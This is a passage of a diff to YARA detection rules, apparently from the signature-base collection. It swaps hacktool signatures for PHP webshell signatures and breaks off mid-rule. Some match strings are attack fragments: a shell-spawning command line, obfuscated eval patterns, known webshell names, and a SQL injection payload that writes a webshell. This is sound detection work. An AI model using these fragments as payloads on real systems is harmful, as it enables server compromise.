+		hash = "b15b073801067429a93e116af1147a21b928b215"
+		hash = "74c92f29cf15de34b8866db4b40748243fb938b4"
+		hash = "042245ee0c54996608ff8f442c8bafb8"
+		logic_hash = "9c995f9c1c5e3a70dbb8170f6d1a2fba51c0f29184a5d3647016b520f4bfc0e3"
+		score = 50
+		quality = -75
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s3 = "<table width=\"60%\" bgcolor=\"black\" cellspacing=\"0\" cellpadding=\"2\" border=\"1\" bordercolor=\"white\"><tr><td>"
-		$s6 = "This tool may be used only by system administrators. I am not responsible for "
+		$new_php1 = /<\?=[\w\s@$]/ wide ascii
+		$new_php2 = "<?php" nocase wide ascii
+		$new_php3 = "<script language=\"php" nocase wide ascii
+		$php_short = "<?"
+		$cpayload1 = /\beval[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload2 = /\bexec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload3 = /\bshell_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload4 = /\bpassthru[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload6 = /\bpopen[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload7 = /\bproc_open[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload8 = /\bpcntl_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload9 = /\bassert[\n\t ]{0,500}\([^)0]/ nocase wide ascii
+		$cpayload10 = /\bpreg_replace[\n\t ]{0,500}\([^\)]{1,100}\/[ismxADSUXju]{0,11}(e|\\x65)/ nocase wide ascii
+		$cpayload12 = /\bmb_ereg_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
+		$cpayload13 = /\bmb_eregi_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
+		$cpayload20 = /\bcreate_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload21 = /\bReflectionFunction[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload22 = /fetchall\(PDO::FETCH_FUNC[\n\t ]{0,500}[,}\)]/ nocase wide ascii
+		$m_cpayload_preg_filter1 = /\bpreg_filter[\n\t ]{0,500}(\([^\)]|\/\*)/ nocase wide ascii
+		$m_cpayload_preg_filter2 = "'|.*|e'" nocase wide ascii
 
 	condition:
-		all of them
+		filesize < 1000KB and ( any of ( $new_php* ) or $php_short at 0 ) and ( any of ( $cpayload* ) or all of ( $m_cpayload_preg_filter* ) ) and ( filesize > 2KB and ( math.entropy ( 500 , filesize -500 ) >= 5.7 and math.mean ( 500 , filesize -500 ) > 80 and math.deviation ( 500 , filesize -500 , 89.0 ) < 24 ) or ( math.entropy ( 500 , filesize -500 ) >= 7.7 and math.mean ( 500 , filesize -500 ) > 120 and math.mean ( 500 , filesize -500 ) < 136 and math.deviation ( 500 , filesize -500 , 89.0 ) > 65 ) )
 }
-rule SIGNATURE_BASE_Angry_IP_Scanner_V2_08_Ipscan
+rule SIGNATURE_BASE_WEBSHELL_PHP_Generic_Backticks : FILE
 {
 	meta:
-		description = "Auto-generated rule on file ipscan.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "5fbcbb95-6cd4-5587-bf44-5b5ed133ce5e"
-		date = "2025-04-14"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L448-L460"
+		description = "Generic PHP webshell which uses backticks directly on user input"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "b2f1d8d0-8668-5641-8ce9-c8dd71f51f58"
+		date = "2021-01-07"
+		modified = "2023-04-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L2428-L2476"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "70cf2c09776a29c3e837cb79d291514a"
-		logic_hash = "1b50856ad35c146a684298a86f1629c45996ab08ffae8486a388805262ec2367"
+		hash = "339f32c883f6175233f0d1a30510caa52fdcaa37"
+		hash = "8db86ad90883cd208cf86acd45e67c03f994998804441705d690cb6526614d00"
+		hash = "af987b0eade03672c30c095cee0c7c00b663e4b3c6782615fb7e430e4a7d1d75"
+		hash = "67339f9e70a17af16cf51686918cbe1c0604e129950129f67fe445eaff4b4b82"
+		hash = "144e242a9b219c5570973ca26d03e82e9fbe7ba2773305d1713288ae3540b4ad"
+		hash = "8db86ad90883cd208cf86acd45e67c03f994998804441705d690cb6526614d00"
+		logic_hash = "faa064686a5632788497d0300ba017c3e564f3b70f07a01f2e49bf7c934feb28"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = 44
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "_H/EnumDisplay/"
-		$s5 = "ECTED.MSVCRT0x"
-		$s8 = "NotSupported7"
+		$backtick = /`\s*\{?\$(_POST\[|_GET\[|_REQUEST\[|_SERVER\['HTTP_)/ wide ascii
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
 
 	condition:
-		all of them
+		(( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and $backtick and filesize < 200
 }
-rule SIGNATURE_BASE_Crack_Loader
+rule SIGNATURE_BASE_WEBSHELL_PHP_Generic_Backticks_OBFUSC : FILE
 {
 	meta:
-		description = "Auto-generated rule on file Loader.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "0c4c7b69-7739-5c1b-8c7c-4aaa724e4455"
-		date = "2025-04-14"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L462-L473"
+		description = "Generic PHP webshell which uses backticks directly on user input"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5ecb329f-0755-536d-8bfa-e36158474a0b"
+		date = "2021-01-07"
+		modified = "2023-04-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L2478-L2524"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f4f79358a6c600c1f0ba1f7e4879a16d"
-		logic_hash = "3380ace7c34c15dfd9a9625c8c4a1ed7e35c1cf3c2eca9b1e00dd0092d256150"
+		hash = "23dc299f941d98c72bd48659cdb4673f5ba93697"
+		hash = "e3f393a1530a2824125ecdd6ac79d80cfb18fffb89f470d687323fb5dff0eec1"
+		hash = "1e75914336b1013cc30b24d76569542447833416516af0d237c599f95b593f9b"
+		hash = "8db86ad90883cd208cf86acd45e67c03f994998804441705d690cb6526614d00"
+		logic_hash = "34354283762d6f62a4537e914d969f84546339da9be533e209d8738605b7e3ac"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = 44
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "NeoWait.exe"
-		$s1 = "RRRRRRRW"
+		$s1 = /echo[\t ]{0,500}\(?`\$/ wide ascii
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
 
 	condition:
-		all of them
+		filesize < 500 and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and $s1
 }
-rule SIGNATURE_BASE_CN_GUI_Scanner
+rule SIGNATURE_BASE_WEBSHELL_PHP_By_String_Known_Webshell : FILE
 {
 	meta:
-		description = "Detects an unknown GUI scanner tool - CN background"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ca88d4d3-5d18-5856-874f-e50deceef54f"
-		date = "2014-04-10"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L475-L492"
+		description = "Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions."
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "05ac0e0a-3a19-5c60-b89a-4a300d8c22e7"
+		date = "2021-01-09"
+		modified = "2023-04-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L2526-L2660"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3c67bbb1911cdaef5e675c56145e1112"
-		logic_hash = "f9281277ad7058527699d1f5037bb78be1363c90f38e2e399592c58f0b313bd7"
-		score = 65
-		quality = 85
-		tags = ""
+		hash = "d889da22893536d5965541c30896f4ed4fdf461d"
+		hash = "10f4988a191774a2c6b85604344535ee610b844c1708602a355cf7e9c12c3605"
+		hash = "7b6471774d14510cf6fa312a496eed72b614f6fc"
+		hash = "decda94d40c3fd13dab21e197c8d05f48020fa498f4d0af1f60e29616009e9bf"
+		hash = "ef178d332a4780e8b6db0e772aded71ac1a6ed09b923cc359ba3c4efdd818acc"
+		hash = "a7a937c766029456050b22fa4218b1f2b45eef0db59b414f79d10791feca2c0b"
+		hash = "e7edd380a1a2828929fbde8e7833d6e3385f7652ea6b352d26b86a1e39130ee8"
+		hash = "0038946739956c80d75fa9eeb1b5c123b064bbb9381d164d812d72c7c5d13cac"
+		hash = "3a7309bad8a5364958081042b5602d82554b97eca04ee8fdd8b671b5d1ddb65d"
+		hash = "a78324b9dc0b0676431af40e11bd4e26721a960c55e272d718932bdbb755a098"
+		hash = "a27f8cd10cedd20bff51e9a8e19e69361cc8a6a1a700cc64140e66d160be1781"
+		hash = "9bbd3462993988f9865262653b35b4151386ed2373592a1e2f8cf0f0271cdb00"
+		hash = "459ed1d6f87530910361b1e6065c05ef0b337d128f446253b4e29ae8cc1a3915"
+		hash = "12b34d2562518d339ed405fb2f182f95dce36d08fefb5fb67cc9386565f592d1"
+		hash = "96d8ca3d269e98a330bdb7583cccdc85eab3682f9b64f98e4f42e55103a71636"
+		hash = "312ee17ec9bed4278579443b805c0eb75283f54483d12f9add7d7d9e5f9f6105"
+		hash = "15c4e5225ff7811e43506f0e123daee869a8292fc8a38030d165cc3f6a488c95"
+		hash = "0c845a031e06925c22667e101a858131bbeb681d78b5dbf446fdd5bca344d765"
+		hash = "d52128bcfff5e9a121eab3d76382420c3eebbdb33cd0879fbef7c3426e819695"
+		logic_hash = "22b6d58e24748933792c29b63c4f68c08b86c17a2751fbef5b93bc06c8c5341d"
+		score = 70
+		quality = -8
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s1 = "good.txt" fullword ascii
-		$s2 = "IP.txt" fullword ascii
-		$s3 = "xiaoyuer" fullword ascii
-		$s0w = "ssh(" wide
-		$s1w = ").exe" fullword wide
+		$pbs1 = "b374k shell" wide ascii
+		$pbs2 = "b374k/b374k" wide ascii
+		$pbs3 = "\"b374k" wide ascii
+		$pbs4 = "$b374k(\"" wide ascii
+		$pbs5 = "b374k " wide ascii
+		$pbs6 = "0de664ecd2be02cdd54234a0d1229b43" wide ascii
+		$pbs7 = "pwnshell" wide ascii
+		$pbs8 = "reGeorg" fullword wide ascii
+		$pbs9 = "Georg says, 'All seems fine" fullword wide ascii
+		$pbs10 = "My PHP Shell - A very simple web shell" wide ascii
+		$pbs11 = "<title>My PHP Shell <?echo VERSION" wide ascii
+		$pbs12 = "F4ckTeam" fullword wide ascii
+		$pbs15 = "MulCiShell" fullword wide ascii
+		$pbs30 = "bot|spider|crawler|slurp|teoma|archive|track|snoopy|java|lwp|wget|curl|client|python|libwww" wide ascii
+		$pbs35 = /@\$_GET\s?\[\d\]\)\.@\$_\(\$_GET\s?\[\d\]\)/ wide ascii
+		$pbs36 = /@\$_GET\s?\[\d\]\)\.@\$_\(\$_POST\s?\[\d\]\)/ wide ascii
+		$pbs37 = /@\$_POST\s?\[\d\]\)\.@\$_\(\$_GET\s?\[\d\]\)/ wide ascii
+		$pbs38 = /@\$_POST\[\d\]\)\.@\$_\(\$_POST\[\d\]\)/ wide ascii
+		$pbs39 = /@\$_REQUEST\[\d\]\)\.@\$_\(\$_REQUEST\[\d\]\)/ wide ascii
+		$pbs42 = "array(\"find config.inc.php files\", \"find / -type f -name config.inc.php\")" wide ascii
+		$pbs43 = "$_SERVER[\"\\x48\\x54\\x54\\x50" wide ascii
+		$pbs52 = "preg_replace(\"/[checksql]/e\""
+		$pbs53 = "='http://www.zjjv.com'"
+		$pbs54 = "=\"http://www.zjjv.com\""
+		$pbs60 = /setting\["AccountType"\]\s?=\s?3/
+		$pbs61 = "~+d()\"^\"!{+{}"
+		$pbs62 = "use function \\eval as "
+		$pbs63 = "use function \\assert as "
+		$pbs64 = "eval(`/*" wide ascii
+		$pbs65 = "/* Reverse engineering of this file is strictly prohibited. File protected by copyright law and provided under license. */" wide ascii
+		$pbs66 = "Tas9er" fullword wide ascii
+		$pbs67 = "\"TSOP_\";" fullword wide ascii
+		$pbs68 = "str_rot13('nffreg')" wide ascii
+		$pbs69 = "<?=`{$'" wide ascii
+		$pbs70 = "{'_'.$_}[\"_\"](${'_'.$_}[\"_" wide ascii
+		$pbs71 = "\"e45e329feb5d925b\"" wide ascii
+		$pbs72 = "| PHP FILE MANAGER" wide ascii
+		$pbs73 = "\neval(htmlspecialchars_decode(gzinflate(base64_decode($" wide ascii
+		$pbs74 = "/*\n\nShellindir.org\n\n*/" wide ascii
+		$pbs75 = "$shell = 'uname -a; w; id; /bin/sh -i';" wide ascii
+		$pbs76 = "'password' . '/' . 'id' . '/' . " wide ascii
+		$pbs77 = "= create_function /*" wide ascii
+		$pbs78 = "W3LL M!N! SH3LL" wide ascii
+		$pbs79 = "extract($_REQUEST)&&@$" wide ascii
+		$pbs80 = "\"P-h-p-S-p-y\"" wide ascii
+		$pbs81 = "\\x5f\\x72\\x6f\\x74\\x31\\x33" wide ascii
+		$pbs82 = "\\x62\\x61\\x73\\x65\\x36\\x34\\x5f" wide ascii
+		$pbs83 = "*/base64_decode/*" wide ascii
+		$pbs84 = "\n@eval/*" wide ascii
+		$pbs85 = "*/eval/*" wide ascii
+		$pbs86 = "*/ array /*" wide ascii
+		$pbs87 = "2jtffszJe" wide ascii
+		$pbs88 = "edocne_46esab" wide ascii
+		$pbs89 = "eval($_HEADERS" wide ascii
+		$pbs90 = ">Infinity-Sh3ll<" ascii
+		$front1 = "<?php eval(" nocase wide ascii
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
+		$dex = { 64 65 ( 78 | 79 ) 0a 30 }
+		$pack = { 50 41 43 4b 00 00 00 02 00 }
 
 	condition:
-		all of them
+		filesize < 1000KB and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and not ( uint16( 0 ) == 0x5a4d or $dex at 0 or $pack at 0 or uint16( 0 ) == 0x4b50 ) and ( any of ( $pbs* ) or $front1 in ( 0 .. 60 ) )
 }
-rule SIGNATURE_BASE_CN_Packed_Scanner : FILE
+rule SIGNATURE_BASE_WEBSHELL_PHP_Strings_SUSP : FILE
 {
 	meta:
-		description = "Suspiciously packed executable"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a11c4ee6-7244-5601-af26-a45f9fdc8e1b"
-		date = "2014-06-10"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L494-L510"
+		description = "typical webshell strings, suspicious"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "25f25df5-4398-562b-9383-e01ccb17e8de"
+		date = "2021-01-12"
+		modified = "2023-07-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L2662-L2748"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "6323b51c116a77e3fba98f7bb7ff4ac6"
-		logic_hash = "0d9178ec65029e4ce8d4c3cc28ebd041c612f3a48f095b60c7a4515de03cccf4"
-		score = 40
-		quality = 83
+		hash = "0dd568dbe946b5aa4e1d33eab1decbd71903ea04"
+		hash = "dde2bdcde95730510b22ae8d52e4344997cb1e74"
+		hash = "499db4d70955f7d40cf5cbaf2ecaf7a2"
+		hash = "281b66f62db5caab2a6eb08929575ad95628a690"
+		hash = "1ab3ae4d613b120f9681f6aa8933d66fa38e4886"
+		logic_hash = "5c3837ab761ee2209fab5fc333b050a56d80addb03b088ae28040c7393429bb3"
+		score = 50
+		quality = 40
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s1 = "kernel32.dll" fullword ascii
-		$s2 = "CRTDLL.DLL" fullword ascii
-		$s3 = "__GetMainArgs" fullword ascii
-		$s4 = "WS2_32.DLL" fullword ascii
+		$sstring1 = "eval(\"?>\"" nocase wide ascii
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
+		$gfp1 = "eval(\"return [$serialised_parameter"
+		$gfp2 = "$this->assert(strpos($styles, $"
+		$gfp3 = "$module = new $_GET['module']($_GET['scope']);"
+		$gfp4 = "$plugin->$_POST['action']($_POST['id']);"
+		$gfp5 = "$_POST[partition_by]($_POST["
+		$gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);"
+		$gfp7 = "The above example code can be easily exploited by passing in a string such as"
+		$gfp8 = "Smarty_Internal_Debug::start_render($_template);"
+		$gfp9 = "?p4yl04d=UNION%20SELECT%20'<?%20system($_GET['command']);%20?>',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php"
+		$gfp10 = "[][}{;|]\\|\\\\[+=]\\|<?=>?"
+		$gfp11 = "(eval (getenv \"EPROLOG\")))"
+		$gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ"
+		$inp1 = "php://input" wide ascii
+		$inp2 = /_GET\s?\[/ wide ascii
+		$inp3 = /\(\s?\$_GET\s?\)/ wide ascii
+		$inp4 = /_POST\s?\[/ wide ascii
+		$inp5 = /\(\s?\$_POST\s?\)/ wide ascii
+		$inp6 = /_REQUEST\s?\[/ wide ascii
+		$inp7 = /\(\s?\$_REQUEST\s?\)/ wide ascii
+		$inp15 = "_SERVER['HTTP_" wide ascii
+		$inp16 = "_SERVER[\"HTTP_" wide ascii
+		$inp17 = /getenv[\t ]{0,20}\([\t ]{0,20}['"]HTTP_/ wide ascii
+		$inp18 = "array_values($_SERVER)" wide ascii
+		$inp19 = /file_get_contents\("https?:\/\// wide ascii
 
 	condition:
-		all of them and filesize < 180KB and filesize > 70KB
+		filesize < 700KB and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and not ( any of ( $gfp* ) ) and ( 1 of ( $sstring* ) and ( any of ( $inp* ) ) )
 }
-rule SIGNATURE_BASE_Tiny_Network_Tool_Generic : FILE
+rule SIGNATURE_BASE_WEBSHELL_PHP_In_Htaccess : FILE
 {
 	meta:
-		description = "Tiny tool with suspicious function imports. (Rule based on WinEggDrop Scanner samples)"
-		author = "Florian Roth (Nextron Systems)"
-		id = "04b1c2c6-605c-52d5-aa07-f3b77a6c4593"
-		date = "2014-08-10"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L512-L545"
+		description = "Use Apache .htaccess to execute php code inside .htaccess"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0f5edff9-22b2-50c9-ae81-72698ea8e7db"
+		date = "2021-01-07"
+		modified = "2023-07-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L2750-L2772"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "efd04ee3a7bb120cdff00369e1856dd03ec9db84e1fb3196bf5e1a8ebd302802"
-		score = 40
+		hash = "c026d4512a32d93899d486c6f11d1e13b058a713"
+		hash = "d79e9b13a32a9e9f3fa36aa1a4baf444bfd2599a"
+		hash = "e1d1091fee6026829e037b2c70c228344955c263"
+		hash = "c026d4512a32d93899d486c6f11d1e13b058a713"
+		hash = "8c9e65cd3ef093cd9c5b418dc5116845aa6602bc92b9b5991b27344d8b3f7ef2"
+		logic_hash = "0652a4cb0cb6c61afece5c2e4cbf2f281714509f0d828047f2e3ccd411602115"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash0 = "9e1ab25a937f39ed8b031cd8cfbc4c07"
-		hash1 = "cafc31d39c1e4721af3ba519759884b9"
-		hash2 = "8e635b9a1e5aa5ef84bfa619bd2a1f92"
+		importance = 70
 
 	strings:
-		$s0 = "KERNEL32.DLL" fullword ascii
-		$s1 = "CRTDLL.DLL" fullword ascii
-		$s3 = "LoadLibraryA" fullword ascii
-		$s4 = "GetProcAddress" fullword ascii
-		$y1 = "WININET.DLL" fullword ascii
-		$y2 = "atoi" fullword ascii
-		$x1 = "ADVAPI32.DLL" fullword ascii
-		$x2 = "USER32.DLL" fullword ascii
-		$x3 = "wsock32.dll" fullword ascii
-		$x4 = "FreeSid" fullword ascii
-		$x5 = "atoi" fullword ascii
-		$z1 = "ADVAPI32.DLL" fullword ascii
-		$z2 = "USER32.DLL" fullword ascii
-		$z3 = "FreeSid" fullword ascii
-		$z4 = "ToAscii" fullword ascii
+		$hta = "AddType application/x-httpd-php .htaccess" wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $s* ) and ( all of ( $y* ) or all of ( $x* ) or all of ( $z* ) ) and filesize < 15KB
+		filesize < 100KB and $hta
 }
-rule SIGNATURE_BASE_Beastdoor_Backdoor
+rule SIGNATURE_BASE_WEBSHELL_PHP_Function_Via_Get : FILE
 {
 	meta:
-		description = "Detects the backdoor Beastdoor"
-		author = "Florian Roth (Nextron Systems)"
-		id = "64f67233-6677-53c8-b212-f1a425f78803"
-		date = "2025-04-14"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L547-L567"
+		description = "Webshell which sends eval/assert via GET"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5fef1063-2f9f-516e-86f6-cfd98bb05e6e"
+		date = "2021-01-09"
+		modified = "2023-04-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L2774-L2818"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5ab10dda548cb821d7c15ebcd0a9f1ec6ef1a14abcc8ad4056944d060c49535a"
-		logic_hash = "35aa5d66c0fd4bf1995fc23a68283e8a28f31b5a1e1f3b742dd0ab89c48bf403"
-		score = 55
-		quality = 85
-		tags = ""
+		hash = "ce739d65c31b3c7ea94357a38f7bd0dc264da052d4fd93a1eabb257f6e3a97a6"
+		hash = "d870e971511ea3e082662f8e6ec22e8a8443ca79"
+		hash = "73fa97372b3bb829835270a5e20259163ecc3fdbf73ef2a99cb80709ea4572be"
+		logic_hash = "309203db8e7374531d359e3a723418d47bead45034c4a7bd726fb714622dc039"
+		score = 75
+		quality = 83
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "Redirect SPort RemoteHost RPort  -->Port Redirector" fullword
-		$s1 = "POST /scripts/WWPMsg.dll HTTP/1.0" fullword
-		$s2 = "http://IP/a.exe a.exe            -->Download A File" fullword
-		$s7 = "Host: wwp.mirabilis.com:80" fullword
-		$s8 = "%s -Set Port PortNumber              -->Set The Service Port" fullword
-		$s11 = "Shell                            -->Get A Shell" fullword
-		$s14 = "DeleteService ServiceName        -->Delete A Service" fullword
-		$s15 = "Getting The UserName(%c%s%c)-->ID(0x%s) Successfully" fullword
-		$s17 = "%s -Set ServiceName ServiceName      -->Set The Service Name" fullword
+		$sr0 = /\$_GET\s?\[.{1,30}\]\(\$_GET\s?\[/ wide ascii
+		$sr1 = /\$_POST\s?\[.{1,30}\]\(\$_GET\s?\[/ wide ascii
+		$sr2 = /\$_POST\s?\[.{1,30}\]\(\$_POST\s?\[/ wide ascii
+		$sr3 = /\$_GET\s?\[.{1,30}\]\(\$_POST\s?\[/ wide ascii
+		$sr4 = /\$_REQUEST\s?\[.{1,30}\]\(\$_REQUEST\s?\[/ wide ascii
+		$sr5 = /\$_SERVER\s?\[HTTP_.{1,30}\]\(\$_SERVER\s?\[HTTP_/ wide ascii
+		$gfp1 = "eval(\"return [$serialised_parameter"
+		$gfp2 = "$this->assert(strpos($styles, $"
+		$gfp3 = "$module = new $_GET['module']($_GET['scope']);"
+		$gfp4 = "$plugin->$_POST['action']($_POST['id']);"
+		$gfp5 = "$_POST[partition_by]($_POST["
+		$gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);"
+		$gfp7 = "The above example code can be easily exploited by passing in a string such as"
+		$gfp8 = "Smarty_Internal_Debug::start_render($_template);"
+		$gfp9 = "?p4yl04d=UNION%20SELECT%20'<?%20system($_GET['command']);%20?>',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php"
+		$gfp10 = "[][}{;|]\\|\\\\[+=]\\|<?=>?"
+		$gfp11 = "(eval (getenv \"EPROLOG\")))"
+		$gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ"
 
 	condition:
-		2 of them
+		filesize < 500KB and not ( any of ( $gfp* ) ) and any of ( $sr* )
 }
-rule SIGNATURE_BASE_Powershell_Netcat
+rule SIGNATURE_BASE_WEBSHELL_PHP_Writer : FILE
 {
 	meta:
-		description = "Detects a Powershell version of the Netcat network hacking tool"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e4b018c0-3214-5102-93b1-6a048324f9dd"
-		date = "2014-10-10"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L569-L583"
+		description = "PHP webshell which only writes an uploaded file to disk"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "05bb3e0c-69b2-5176-a3eb-e6ba2d72a205"
+		date = "2021-04-17"
+		modified = "2023-07-05"
+		reference = "Internal Research"
